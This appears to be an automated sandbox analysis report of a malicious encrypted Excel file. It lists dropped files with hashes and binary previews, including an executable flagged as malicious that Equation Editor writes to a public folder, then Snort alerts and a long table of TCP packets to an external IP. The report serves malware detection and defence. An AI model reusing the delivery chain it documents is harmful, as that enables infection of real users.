SSDEEP:	96:+Q9KyOE9ulJ01zAcTCcAZd+0Mvin1EFi0sAMcNV99iyysx8JXmaaINsWHfjMzNzl:4yvmJ0VmQE/Ovi0aa5EMzNzl
MD5:	871E67261292737F85DEE051B2EF5B1A
SHA1:	3108E69E8BEABB0CD820696E9F22889B5E7D3224
SHA-256:	F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
SHA-512:	3C0CC7DF2D5080166C1C35C0D120CA686A8EF09348AB0F28CE6859FEC9F7DD3AB16955D79E1C092A5D78666FAE978F69E632D9FB307776E69FD586ADA605FEAF
Malicious:	false
Preview:	.PNG........IHDR.............'P......gAMA......a.....sRGB.........pHYs..........o.d....PLTE...............LLL.....................................................................ppp......`.6................?.6.._...`Bi...Y..f...%E........_...5DG....._.tNq.8.6..<?.....5...PVj..X.1...4U..._z..ANTT.b...kt..zZ5...........__..........~.......ff`.........H#....DIDATx..[.[....R..lK.\|....E*........P.....sz...3..I...X#.....ffwv...n...~:.X...E}......\`}.g..>.3.X........r!.`.:..B8\.f0f....lx4..7s.o....F.&..\............s!\........o.....Ssa....1.X.<9."sso...G.\XX..q.2.....D@.0...".'.'/0.......K.px......X.....`......iD..c.-.....J//.o.,....<......9m). ..R...@'..q.y....N..&$...v94.q..<.w.\.P......f_.... ...B.0}o.....y......l.Z..PzRb..F.....[..)..........J,....B....t(..BR...w .Q...S...H...{.....7P........o...Ol..fV.\.........}.......A'.g.:E.7.u.........\|.5pDj..f0.E:n..'. .....E..j^..tp\H;....3...C\..u.e..P.{...6.9....".6M....K..".F.D.a0.....\|>.T...x.Yj....C".

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C66FDE9A.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7608
Entropy (8bit):	5.081534585293476
Encrypted:	false
SSDEEP:	96:+SScL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5SMjU+H3tWa6WdTfOYLpR8d
MD5:	34734D58A005F28BC9049B43A3E75B3A
SHA1:	B7B46F5D1DFDCAC3CD18117CFC15501758F1B03E
SHA-256:	FE46C65A2F5E133536E8B774CFFCF8BEBC38322420341D12DA0AF672C3F1605C
SHA-512:	4734DD55FD4737C9B75F84908E75B3D5F9A52F9787D847E19B61B2CDE1B975A53A502832533C00F73BFE49B01DE194CA51976F063C30E71C3D65240BAD5838D2
Malicious:	false
Preview:	....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....%.d.......................@......p....\......................p.........6Pv...p....`..p.g..$y.v.L....2............v....$.......d.......$....^.p.....^.p.C...L..`.....2.-........<.v................<.>v.Z.v....X.Ud.....g.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBFEF85C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\Desktop\~$oustanding 03082921.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1336832
Entropy (8bit):	7.015277955515814
Encrypted:	false
SSDEEP:	24576:JvvbQF4jajOm9u+d7bs6IpQf4DMqMuulZcjLsq3ut:FbQOmi0Zbwp3DlFu
MD5:	214B1DDF045E4D6FDD73A5C8788D2ADC
SHA1:	8BB7C462FB649D16EDB98AB526DF8475A329CC71
SHA-256:	D8E25CE44C46057985A0467ADCF4FC12D8BEAC599E3031F6674FD1E01988267E
SHA-512:	781FFF07EDCB65EC4C77C80F20A6C6AA658F4679C411654ABCDC1233F19CEA170B47EBB5A4227618459482F32462AF12188A7CB870BD3EB347696485BB530E3C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.a..............P..p.............. ........@.. ....................................@.................................x...O.................................................................................... ............... ..H............text....o... ...p.................. ..`.rsrc................r..............@..@.reloc...............d..............@..B........................H.......L...d8......M....................................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r%..p~....o-...(......t$....+..Vs....(/...t...........(0...*.0..........

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.99483782151375
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	oustanding 03082921.xlsx
File size:	1328640
MD5:	643fc978b1f9e32668a88202a7091266
SHA1:	ee970a6713bd017fd118a1eb54a237339c4fd579
SHA256:	e3469b3d96e6316114395abe8caef91aa9ac9edac2d701c2d64981d3c0dfc5f0
SHA512:	f79bb5fa23c6a11c3a472a7788e766fff9a20569f81aeec2b0c8fdb3468c8c1684689848da1a8c0984a07ef781c980cf33ed0d81ae9550b654fba25bd2b32f10
SSDEEP:	24576:hf9gv6PaMg7ZG90Gv9LITkAoPZGr/ST/1HLU+CZdKd6Hfsc+Xu2ZTHQI5O:rguaJ2viu+/8/1rKZdK+fXuTpQI5O
File Content Preview:	........................>...............................................................................................................~...............z......................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/03/21-16:51:55.653334	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49169	34.102.136.180	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 16:50:35.938045025 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.105318069 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.105552912 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.106041908 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.275635004 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.275665045 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.275685072 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.275701046 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.275732040 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.275767088 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.445563078 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445595980 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445614100 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445630074 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445646048 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445662022 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445676088 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445693016 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.445812941 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.447524071 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.618575096 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618609905 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618757963 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618776083 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618793011 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618837118 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618854046 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618870974 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.618887901 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619154930 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619173050 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619189978 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619205952 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619224072 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.619239092 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.622759104 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.627042055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.792352915 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792388916 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792403936 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792417049 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792429924 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792455912 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792486906 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792499065 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792514086 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792582989 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792612076 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792628050 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792644978 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792712927 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792732000 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.792742014 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792758942 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792774916 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.792826891 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.792826891 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792846918 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792859077 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.792887926 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.794888973 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.795614958 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961519003 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961546898 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961565018 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961582899 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961595058 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961607933 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961620092 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961632967 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961646080 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961653948 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961659908 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961672068 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961684942 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961690903 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961698055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961702108 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961714983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961731911 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961747885 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961749077 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961766005 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961767912 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961786032 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961786032 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961796999 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961805105 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961821079 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961824894 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961838961 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961841106 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961853027 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961855888 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961872101 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961873055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961888075 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961889982 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961905003 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961905956 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961919069 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961925983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961934090 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961945057 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961961031 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961966991 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961977959 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961982012 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.961994886 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.961997986 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.962011099 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.962013960 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.962032080 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.962045908 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.962558031 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.962579012 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:36.962626934 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:36.964080095 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.129837990 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.129865885 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.129882097 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.129900932 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.129920006 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.129936934 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.129952908 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.129968882 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.129983902 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130000114 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130012035 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130028009 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130043030 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130045891 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.130059004 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130074978 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130079031 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.130093098 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130096912 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.130110979 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.130115986 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130125999 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.130136013 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130146980 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.130152941 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130168915 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130170107 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.130187035 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130187988 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.130203009 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130204916 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.130218983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.130223989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.130240917 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.130256891 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131203890 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131241083 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131258011 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131258011 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131273985 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131283998 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131289005 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131294012 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131306887 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131314993 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131325006 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131335020 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131345034 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131351948 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131364107 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131369114 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131381989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131387949 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131400108 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131406069 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131419897 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131423950 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131438971 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131444931 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131458044 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131464958 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131477118 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131481886 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131494045 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131500006 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131510973 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131517887 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131534100 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131535053 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131550074 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131551981 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131567001 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131568909 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131586075 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131586075 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131603003 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131604910 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131622076 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131622076 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131639957 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131642103 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131655931 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.131656885 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131674051 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.131694078 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.133227110 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.299568892 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.299608946 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.299638033 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.299665928 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.299693108 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.299717903 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.299742937 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.299767017 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.299788952 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.299822092 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.299824953 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.302690983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.302736998 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.302762985 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.302788973 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.302809000 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.302829027 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.302841902 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.302848101 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.302870989 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.302895069 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.302897930 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.302920103 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.302921057 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.302959919 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.302961111 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.302973986 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.302989006 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303002119 CEST	49167	80	192.168.2.22	13.229.216.142
